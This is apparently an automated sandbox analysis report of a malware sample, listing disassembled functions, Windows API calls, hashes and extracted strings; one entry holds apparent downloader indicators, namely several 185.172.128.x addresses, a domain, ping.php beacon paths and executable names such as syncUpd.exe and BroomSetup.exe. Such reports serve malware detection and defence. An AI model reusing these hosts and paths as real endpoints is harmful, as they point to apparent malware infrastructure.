                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 420165198-0
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        control_flow_graph 1753 40e78b-40e798 call 40e078 call 4178b7 1758 40e79a-40e7c0 call 4165f6 DeleteCriticalSection 1753->1758 1761 40e7c2-40e7c8 call 41629a 1758->1761 1763 40e7cd-40e7d6 1761->1763
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 004178B7: DeleteCriticalSection.KERNEL32(?,?,?,?,?,00439658,00000010,0040E798), ref: 00417919
                                                                                                                                                                                                                                                                                          • Part of subcall function 004178B7: _free.LIBCMT ref: 00417927
                                                                                                                                                                                                                                                                                          • Part of subcall function 004165F6: _free.LIBCMT ref: 00416618
                                                                                                                                                                                                                                                                                        • DeleteCriticalSection.KERNEL32(-00000020), ref: 0040E7B4
                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0040E7C8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _free$CriticalDeleteSection
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1906768660-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 08f9283f582d2b0ed7622fb32ff0d585bec8a3f1b87bc5093eafe47af9dfc470
                                                                                                                                                                                                                                                                                        • Instruction ID: 0eba196ff218c88136f89900f6ed687e6dcf2c74d43c6b606195c95022efc802
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08f9283f582d2b0ed7622fb32ff0d585bec8a3f1b87bc5093eafe47af9dfc470
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ABE048728145205FDB217F6DFC86A9A37A4BF48325746143EF44663165CB34AC61C75C
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000400,?,?,04200223,?,?), ref: 04200E19
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,04200223,?,?), ref: 04200E1E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorMode
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                        • Instruction ID: 7f18243f094355aed393038a9e4f666a0cd0c293d4ed3e5987dac0fabc226c75
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4DD0123124512877D7002A94DC09BCD7B5CDF09B62F008011FB0DE9081C770954046E5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
                                                                                                                                                                                                                                                                                        • Instruction ID: d77f3fb4a2dea80d7e26f58f35abdac3f7963be9eaf0666b1d936bf3e200b83d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11510771A00108AFDB10DF29C840BFA7BA1EF85364F19815EE8489B392CB39DD82C759
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
                                                                                                                                                                                                                                                                                        • Instruction ID: 0bde1253143090ae73d8540e9fd285f072e0ff93183f3a7406587cf81db67a05
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF316B31604706AFC710DE29C884A5ABBA0BF88354F04863EF954A73A1D779D854CB9A
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004024A6
                                                                                                                                                                                                                                                                                          • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                                                                          • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Exception@8H_prologThrowstd::system_error::system_error
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 938716162-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 540de7721727b4ca24ecd9efb376f8aeec338981f0a8d92e2b0ead1ad3aa5908
                                                                                                                                                                                                                                                                                        • Instruction ID: 51a424f7f6e89c6a531f911fc24cb136489b0386115aa572e9e255c0d5409117
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 540de7721727b4ca24ecd9efb376f8aeec338981f0a8d92e2b0ead1ad3aa5908
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9318B71A00505AFCB18DF69C9D5E6AB7F5FF84318718C16EE416AB791C634EC40CB54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00402581
                                                                                                                                                                                                                                                                                          • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b880830fb10006c245270c451b658a342de933d97101c235293ed34406791828
                                                                                                                                                                                                                                                                                        • Instruction ID: 5794e906f2440793f0f111a630642e31dc7bb6ced8b38f44c89e924cf631a0c7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b880830fb10006c245270c451b658a342de933d97101c235293ed34406791828
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87318770A00615AFCB15DF09CA84A9ABBB1FF48314F14856EE405AB791C7B9ED40CB94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                                                                          • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d6c6d0674046824ae49e356bd95e2b3b32d4d687766b11b914c442daf499c3b2
                                                                                                                                                                                                                                                                                        • Instruction ID: 4e0495d31301cfc09fe992fc8428b3d42591f74c8e771436201b91ad316d0700
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6c6d0674046824ae49e356bd95e2b3b32d4d687766b11b914c442daf499c3b2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D217C70601611DFC728DF19C54896ABBF5FF88314B20C26DE85A9B7A1C774AE41CB90
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: H_prolog
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 94d41c902baa54b1b7ab3027f5a178ce52665b7b455d6233b737f42a58ba5fa1
                                                                                                                                                                                                                                                                                        • Instruction ID: ebd396bbc56fc5044348258bf57d62a6d48641e9a3723b70d5712ae04e929cd2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 94d41c902baa54b1b7ab3027f5a178ce52665b7b455d6233b737f42a58ba5fa1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9511D031A042048ECB04DFA9C895BEEBFB4BF44314F08812ED8417B2C2D7789A45CB64
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
                                                                                                                                                                                                                                                                                        • Instruction ID: 62b4485d732ad4ebc0017ff3881fb56af0f069673ee8f9cf524c42d6b5156d4d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d91d9df30251d2d82c78a357851f1850054374a36094e401c27366056efc238
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6911367590410AAFCB05DF98E9419EB7BF4EF48314F0040AAF819AB311D631E9618BA9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 83cec55c4b5daa9d74b2b4d2a978cdeff380abe4f85b56f60a07e90a3d372b1e
                                                                                                                                                                                                                                                                                        • Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83cec55c4b5daa9d74b2b4d2a978cdeff380abe4f85b56f60a07e90a3d372b1e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                                                                          • Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                                                                          • Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                                                                          • Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                                                                          • Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                                                                          • Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
• API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
• String ID:
• API String ID: 3585332825-0
• Opcode ID: 9e5b33f735e5741d3742e5114604eb84fbebb543a0d7af76fa80b020808a8594
• Instruction ID: 4123f54f6db546b52d5441bf0cc69889d4086bdab9222fcc4d2dc13d92cadc12
• Opcode Fuzzy Hash: 9e5b33f735e5741d3742e5114604eb84fbebb543a0d7af76fa80b020808a8594
• Instruction Fuzzy Hash: 32018F70610114AFDB14DB65CA0ABAEB3F9AF44708F00403EF405B76D1DBF8AE408B58
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 93a3af6b4d2091d414adecc1df8379ca51dbaf06e002591ee7f00cc1388aa319
• Instruction ID: b492b302e4735b3d70b5ef79ffcf6f17a9fdb10017537b69176e17197afc0c8a
• Opcode Fuzzy Hash: 93a3af6b4d2091d414adecc1df8379ca51dbaf06e002591ee7f00cc1388aa319
• Instruction Fuzzy Hash: 6DF09A3251111CBBCF015E96DC01DDA3B6EEF89324F100256FD2492050DA3ACA61ABA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
Memory Dump Source
• Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
• Instruction ID: dd4a480e522f73ad3d9a6edd52b828d095e0909c103fd04d4038ae70eb088b48
• Opcode Fuzzy Hash: 092e8eca157d4569dfa0d65f99c280fa9eac993ee60f56a2dbe510387d4a55ad
• Instruction Fuzzy Hash: 35E0A03128822557972026629C00BDF6A69AF417E0B150223BC0496290CA5C8BD182AD
Uniqueness

Uniqueness Score: -1.00%

APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00409967
Memory Dump Source
• Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
Similarity
• API ID: Exception@8Throw
• String ID:
• API String ID: 2005118841-0
• Opcode ID: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
• Instruction ID: da63f0164d942bc1a0aafd7abbbc04ca9aad8e839738e50b0fb3006ae61beab9
• Opcode Fuzzy Hash: 489952d28efb397f2e18812c634cc1d627a37715331dca0dd55d847e965f5b37
• Instruction Fuzzy Hash: E9E0923440430EB6CF047A66D9169AA372C1E00324F20897FB818B55E2EB78DDA6C59E
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
Memory Dump Source
• Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
• Instruction ID: d84f72958a1ce38eec5c6f13dd7d1e1a4f86a781eb43601fc0a5ec169b289762
• Opcode Fuzzy Hash: 8f292a683753c08d8b1a23b46936a59e33a617ccbc84d6f71105d7b09af89fad
• Instruction Fuzzy Hash: B2D06C3210010DBBDF129F84DC06EDA7BAAFB48754F018010BA5856060C732E872AB94
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 042EDFAE
Memory Dump Source
• Source File: 00000000.00000002.2435074573.00000000042ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 042ED000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_42ed000_4BfhCycV4B.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: f751d1c35a8858e7e2216be11113b0584304f3de6e9f5e4c53beee45f889d81d
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: 83113979A10208EFDB01DF99C985E98BFF5AF08351F0580A4F9489B362D771EA90DF80
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 042265BB: __EH_prolog.LIBCMT ref: 042265C0
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043CEE4), ref: 04224E6C
  • Part of subcall function 04226149: __EH_prolog.LIBCMT ref: 0422614E
  • Part of subcall function 04226149: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 04226230
Strings
Memory Dump Source
• Source File: 00000000.00000002.2429971918.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4200000_4BfhCycV4B.jbxd
Yara matches
Similarity
• API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
• String ID: @$/1/Qg_Appv5.exe$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$Qg_Appv5.exe$SOFTWARE\BroomCleaner$eight$five$nine$note.padd.cn.com$one$seven$ten$two
• API String ID: 2531350358-486824737
• Opcode ID: 33da481005bee5aae73a4727e24a90ce0064b3984eafc34884cbf9b1cd4f467e
                                                                                                                                                                                                                                                                                        • Instruction ID: 094fc236602900118e9e83e832c7a050ce9e42ba4538cfc3840922c0222c3c00
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33da481005bee5aae73a4727e24a90ce0064b3984eafc34884cbf9b1cd4f467e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3A2211162B2D0BEE711F778589659E3FE11B63344F94E4A9D4A0BB3A3C954A10CC3AF
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00420AA7
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00420B02
                                                                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00420B11
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,=CA,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420B59
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000004,00000040), ref: 00420B78
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2421423613.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2421423613.000000000043E000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_4BfhCycV4B.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                                                                        • String ID: 0B$=CA$=CA$=CA
                                                                                                                                                                                                                                                                                        • API String ID: 745075371-1249640317
                                                                                                                                                                                                                                                                                        • Opcode ID: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                                                                        • Instruction ID: 4fe3cdac360959e8bc756ce2b097bcf421192d2936f9b63a8d14e5918577f4e5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4cb23aab0735c5b4cc35bd03c159b6d2568e8db36e90407488946ecd2a914ac6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E519471B003259BDB20DFA5EC45BBF73F8AF24700FC4446AA904E7292D77899408B59
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00414344,?,?,?,?,00413D9B,?,00000004), ref: 00420145
                                                                                                                                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 004201D5
                                                                                                                                                                                                                                                                                        • _wcschr.LIBVCRUNTIME ref: 004201E3
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,DCA,00000000,?), ref: 00420286
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
